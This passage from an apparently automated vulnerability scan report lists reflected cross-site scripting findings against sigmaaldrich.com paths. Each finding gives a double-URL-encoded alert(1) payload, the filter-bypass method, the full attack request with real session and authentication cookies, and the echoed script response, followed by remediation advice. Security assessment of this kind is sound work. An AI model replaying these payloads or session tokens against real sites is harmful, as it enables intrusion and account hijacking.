Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:36 GMT
Content-Length: 28983
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-supporta9f32";alert(1)//de0fca75292/customer-service/services/basic-research","E404") ;
   </script>
...[SNIP]...

1.155. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28f4c%2522%253balert%25281%2529%252f%252f09cfe3811 was submitted in the REST URL parameter 4. This input was echoed as 28f4c";alert(1)//09cfe3811 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service28f4c%2522%253balert%25281%2529%252f%252f09cfe3811/services/basic-research HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:38 GMT
Content-Length: 28981
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service28f4c";alert(1)//09cfe3811/services/basic-research","E404") ;
   </script>
...[SNIP]...

1.156. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b360f%2522%253balert%25281%2529%252f%252fa8d8a144874 was submitted in the REST URL parameter 5. This input was echoed as b360f";alert(1)//a8d8a144874 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/servicesb360f%2522%253balert%25281%2529%252f%252fa8d8a144874/basic-research HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:39 GMT
Content-Length: 28983
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/servicesb360f";alert(1)//a8d8a144874/basic-research","E404") ;
   </script>
...[SNIP]...

1.157. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3d39%2522%253balert%25281%2529%252f%252fbaba3e27b12 was submitted in the REST URL parameter 6. This input was echoed as f3d39";alert(1)//baba3e27b12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/basic-researchf3d39%2522%253balert%25281%2529%252f%252fbaba3e27b12 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:42 GMT
Content-Length: 28983
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/basic-researchf3d39";alert(1)//baba3e27b12","E404") ;
   </script>
...[SNIP]...

1.158. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a94c%2522%253balert%25281%2529%252f%252f3c92b03dd5a was submitted in the REST URL parameter 1. This input was echoed as 7a94c";alert(1)//3c92b03dd5a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content7a94c%2522%253balert%25281%2529%252f%252f3c92b03dd5a/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:33 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content7a94c";alert(1)//3c92b03dd5a/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting","E404") ;
   </script>
...[SNIP]...

1.159. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e07e%2522%253balert%25281%2529%252f%252fde125272a10 was submitted in the REST URL parameter 2. This input was echoed as 3e07e";alert(1)//de125272a10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich3e07e%2522%253balert%25281%2529%252f%252fde125272a10/customer-support/customer-service/services/basic-research/technical-consulting HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
